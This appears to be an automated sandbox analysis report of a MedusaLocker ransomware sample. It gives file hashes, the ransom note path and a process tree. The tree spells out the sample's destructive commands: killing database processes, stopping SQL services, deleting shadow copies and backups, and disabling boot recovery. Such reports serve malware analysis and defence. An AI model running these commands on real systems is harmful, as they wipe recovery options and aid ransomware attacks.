Analysis
-
max time kernel
0s -
max time network
132s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
28-10-2024 13:49
Static task
static1
Behavioral task
behavioral1
Sample
33.out
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
33.out
-
Size
1.8MB
-
MD5
3d0c932d0eab4d6c5ce08b9ce2b7d335
-
SHA1
b1058433c97fdee8bbad3e393515b4c5dfb4756a
-
SHA256
f73508dfaf27c9eaeccf20fde21c0292202ad65bf16c4c0c2285fc4f24f933d6
-
SHA512
48f115dd25805ef59c508c7f193dc56c9a0fb7b2798e6628b1a89573e34a1ad1f094f52b508e6e196f6dbc326587a211dfb04ef64226976f66a5e179ae5c847c
-
SSDEEP
24576:SBHZBBnZ7xWVcvcD6U7yZJet53ob5XKh2ZQ21:yBndxWVZD6U7yZAtJob5XC2ZQ21
Malware Config
Extracted
/mnt/How_to_back_files.html
medusalocker
Signatures
-
MedusaLocker
Ransomware with several variants first seen in September 2019.
-
Medusalocker family
-
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
33.outdescription ioc Process File opened for reading /sys/devices/system/cpu/online 33.out -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/33.out/tmp/33.out1⤵
- Reads CPU attributes
PID:2821 -
/bin/shsh -c -- "rem Kill \"SQL\""2⤵PID:2827
-
-
/bin/shsh -c -- "taskkill -f -im sqlbrowser.exe"2⤵PID:2828
-
-
/bin/shsh -c -- "taskkill -f -im sql writer.exe"2⤵PID:2829
-
-
/bin/shsh -c -- "taskkill -f -im sqlserv.exe"2⤵PID:2830
-
-
/bin/shsh -c -- "taskkill -f -im msmdsrv.exe"2⤵PID:2831
-
-
/bin/shsh -c -- "taskkill -f -im MsDtsSrvr.exe"2⤵PID:2832
-
-
/bin/shsh -c -- "taskkill -f -im sqlceip.exe"2⤵
- System Network Configuration Discovery
PID:2833
-
-
/bin/shsh -c -- "taskkill -f -im fdlauncher.exe"2⤵PID:2834
-
-
/bin/shsh -c -- "taskkill -f -im Ssms.exe"2⤵PID:2835
-
-
/bin/shsh -c -- "taskkill -f -im SQLAGENT.EXE"2⤵PID:2836
-
-
/bin/shsh -c -- "taskkill -f -im fdhost.exe"2⤵PID:2837
-
-
/bin/shsh -c -- "taskkill -f -im ReportingServicesService.exe"2⤵PID:2838
-
-
/bin/shsh -c -- "taskkill -f -im msftesql.exe"2⤵PID:2839
-
-
/bin/shsh -c -- "taskkill -f -im pg_ctl.exe"2⤵PID:2840
-
-
/bin/shsh -c -- "taskkill -f -impostgres.exe"2⤵PID:2841
-
-
/bin/shsh -c -- "net stop MSSQLServerADHelper100"2⤵PID:2842
-
-
/bin/shsh -c -- "net stop MSSQL\$ISARS"2⤵PID:2843
-
-
/bin/shsh -c -- "net stop MSSQL\$MSFW"2⤵PID:2844
-
-
/bin/shsh -c -- "net stop SQLAgent\$ISARS"2⤵PID:2845
-
-
/bin/shsh -c -- "net stop SQLAgent\$MSFW"2⤵PID:2846
-
-
/bin/shsh -c -- "net stop SQLBrowser"2⤵PID:2847
-
-
/bin/shsh -c -- "net stop REportServer\$ISARS"2⤵PID:2848
-
-
/bin/shsh -c -- "net stop SQLWriter"2⤵PID:2849
-
-
/bin/shsh -c -- "vssadmin.exe Delete Shadows /All /Quiet"2⤵PID:2850
-
-
/bin/shsh -c -- "wbadmin delete backup -keepVersion:0 -quiet"2⤵PID:2851
-
-
/bin/shsh -c -- "wbadmin DELETE SYSTEMSTATEBACKUP"2⤵PID:2852
-
-
/bin/shsh -c -- "wbadmin DELETE SYSTEMSTABACKUP -deleteOldest"2⤵PID:2853
-
-
/bin/shsh -c -- "wmic.exe SHADOWCOPY /nointeractive"2⤵PID:2854
-
-
/bin/shsh -c -- "bcdedit.exe /set {default} recoverynabled No"2⤵PID:2855
-
-
/bin/shsh -c -- "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"2⤵PID:2856
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD565a5745417dacb585c2d9a690c13ac35
SHA16a8b7f133d738c1b1b9285af64d6ee72fb272636
SHA256d90b8ade801aaa4b194827281e34143a82c494557d379ec3bd1c43317e770cdc
SHA5120818e4f9e651b07a6179cd04c18ec4e844ca57858f13ac6a540e3b7aff691c677c878d85c2f3f4cf1eeac9dbda89419f87289c6362d8cda42acf1813ebd85fef